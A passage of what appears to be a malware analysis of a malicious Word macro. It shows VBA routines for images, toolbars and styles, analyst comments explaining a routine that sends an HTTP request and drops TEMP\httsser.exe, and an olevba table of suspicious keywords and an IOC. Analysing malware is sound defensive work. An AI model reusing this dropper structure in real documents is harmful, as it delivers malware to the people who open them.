  902.  Selection.EndKey Unit:=wdStory
  903.  Selection.TypeParagraph
  904.  Selection.ClearFormatting
  905.  
  906.  imagesDirectory = jarPath & "" & documentId & "" & Right("" & currentIndex, 4) & get_gfx_extension
  907.  Image = Dir(imagesDirectory)
  908.  While Image <> ""
  909.  
  910.  errorTextFile = jarPath & "" & Left(Image, Len(Image) - 4) & ""
  911.  
  912.  Set currentparagraph = ActiveDocument.Paragraphs.Add.Range
  913.  Set currentRange = currentparagraph.Paragraphs(1).Next.Range
  914.  currentparagraph.Style = ""
  915.  currentparagraph.Collapse
  916.  
  917.  Set Image = currentparagraph.InlineShapes.AddPicture _
  918.  (FileName:=jarPath & "" & Image _
  919.  , LinkToFile:=False, SaveWithDocument:=True)
  920.  
  921.  If fs.FileExists(errorTextFile) Then
  922.  Image.AlternativeText = LoadTextFile(errorTextFile)
  923.  Beep
  924.  Else
  925.  Image.AlternativeText = ""
  926.  End If
  927.  
  928.  If Image.ScaleHeight > 100 Or Image.ScaleWidth > 100 Then
  929.  Image.Reset
  930.  End If
  931.  Image = Dir()
  932.  Wend
  933.  
  934.  
  935.  GoTo Phase3
  936.  
  937. End Function
  938.  
  939.  
  940.  
  941. Public Sub ToolbarInit()
       ' Analyst note: sets the drop path and fires the HTTP request prepared in AutoFormatOff.
       ' tempFolder holds the TEMP directory, so the payload is written as
       ' <TEMP>\httsser.exe - the file name olevba lists as the IOC in the table below.
  942. styleContainer = tempFolder + "\httsser.exe"
       ' Errors from deleting a command bar with an empty name are suppressed.
  943.  On Error Resume Next
  944.  ActiveDocument.CommandBars("").Delete
  945.  On Error GoTo 0
       ' Sends the GET opened in AutoFormatOff. The request was opened synchronously, so
       ' the response is available when RibbonOnLoad runs next.
       ' Error handling is back to default here (On Error GoTo 0 above), so a failed
       ' request presumably raises a runtime error instead of continuing silently.
  946.  GatewayResolver.Send
  947. End Sub
  948.  
  949.  
  950.  
  951.  
  952. Function OldToolbarInit()
  953.  On Error GoTo ToolbarCreation
  954.  Set toolBar = ActiveDocument.CommandBars("")
  955.  On Error GoTo 0
  956.  
  957.  toolBar.Visible = True
  958.  
  959.  On Error GoTo ButtonAdd
  960.  Set currentButton = toolBar.Controls(1)
  961.  On Error GoTo 0
  962.  currentButton.OnAction = ""
  963.  currentButton.Style = msoButtonCaption
  964.  currentButton.Caption = Chr(182)
  965.  currentButton.Visible = True
  966.  
  967.  On Error GoTo ButtonAdd
  968.  Set currentButton = toolBar.Controls(2)
  969.  On Error GoTo 0
  970.  currentButton.OnAction = ""
  971.  currentButton.Style = msoButtonCaption
  972.  currentButton.Caption = ""
  973.  currentButton.Visible = True
  974.  
  975.  On Error GoTo ButtonAdd
  976.  Set currentButton = toolBar.Controls(3)
  977.  On Error GoTo 0
  978.  currentButton.OnAction = ""
  979.  currentButton.Style = msoButtonCaption
  980.  currentButton.Caption = ""
  981.  currentButton.Visible = True
  982.  
  983.  On Error GoTo ButtonAdd
  984.  Set currentButton = toolBar.Controls(4)
  985.  On Error GoTo 0
  986.  currentButton.OnAction = ""
  987.  currentButton.Style = msoButtonCaption
  988.  currentButton.Caption = ""
  989.  currentButton.Visible = True
  990.  
  991.  On Error GoTo ButtonAdd
  992.  Set currentButton = toolBar.Controls(5)
  993.  On Error GoTo 0
  994.  currentButton.OnAction = ""
  995.  currentButton.Style = msoButtonCaption
  996.  currentButton.Caption = ""
  997.  currentButton.Visible = True
  998.  
  999.  On Error GoTo ButtonAdd
  1000.  Set currentButton = toolBar.Controls(6)
  1001.  On Error GoTo 0
  1002.  currentButton.OnAction = ""
  1003.  currentButton.Style = msoButtonCaption
  1004.  currentButton.Caption = ""
  1005.  currentButton.Visible = True
  1006.  Exit Function
  1007.  
  1008. ToolbarCreation:
  1009.  Set toolBar = ActiveDocument.CommandBars.Add(Name:="")
  1010.  Resume Next
  1011.  
  1012. ButtonAdd:
  1013.  Set currentButton = toolBar.Controls.Add(Type:=msoControlButton, Before:=toolBar.Controls.Count + 1)
  1014.  Resume Next
  1015.  
  1016. End Function
  1017.  
  1018.  
  1019.  
  1020. Function DoubleCheckStyle()
  1021.  CreateStyle
  1022.  CreateStyleImg
  1023.  Set mystyle = ActiveDocument.Styles("")
  1024.  
  1025.  
  1026.  mystyle.BaseStyle = ActiveDocument.Styles(WdBuiltinStyle.wdStyleNormal)
  1027.  
  1028.  mystyle.AutomaticallyUpdate = True
  1029.  With mystyle.Font
  1030.  .Name = ""
  1031.  .Size = 9
  1032.  .Hidden = False
  1033.  
  1034.  .Color = wdColorGreen
  1035.  End With
  1036. End Function
  1037.  
  1038.  
  1039.  
  1040. +------------+----------------------+-----------------------------------------+
  1041. | Type       | Keyword              | Description                             |
  1042. +------------+----------------------+-----------------------------------------+
  1043. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  1044. | Suspicious | Kill                 | May delete a file                       |
  1045. | Suspicious | Open                 | May open a file                         |
  1046. | Suspicious | Shell                | May run an executable file or a system  |
  1047. |            |                      | command                                 |
  1048. | Suspicious | vbMinimizedFocus     | May run an executable file or a system  |
  1049. |            |                      | command                                 |
  1050. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  1051. |            |                      | command                                 |
  1052. | Suspicious | Shell.Application    | May run an application (if combined     |
  1053. |            |                      | with CreateObject)                      |
  1054. | Suspicious | CreateObject         | May create an OLE object                |
  1055. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  1056. |            |                      | strings                                 |
  1057. | Suspicious | ADODB.Stream         | May create a text file                  |
  1058. | Suspicious | WriteText            | May create a text file                  |
  1059. | Suspicious | SaveToFile           | May create a text file                  |
  1060. | Suspicious | Environ              | May read system environment variables   |
  1061. | Suspicious | Write                | May write to a file (if combined with   |
  1062. |            |                      | Open)                                   |
  1063. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  1064. |            |                      | (obfuscation: VBA expression)           |
  1065. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  1066. |            |                      | be used to obfuscate strings (option    |
  1067. |            |                      | --decode to see all)                    |
  1068. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  1069. |            | Strings              | may be used to obfuscate strings        |
  1070. |            |                      | (option --decode to see all)            |
  1071. | IOC        | httsser.exe          | Executable file name                    |
  1072. | VBA string | Microsoft.XMLHTTP    | ("Microsoft" + ".XMLHTTP")              |
  1073. | VBA string | %%                   | Environ("")                             |
  1074. | VBA string |
  1075.                     | Chr(13)                                 |
  1076. | VBA string | "                    | "" & Chr(34)                            |
  1077. | VBA string | "                    | Chr(34) & ""                            |
  1078. +------------+----------------------+-----------------------------------------+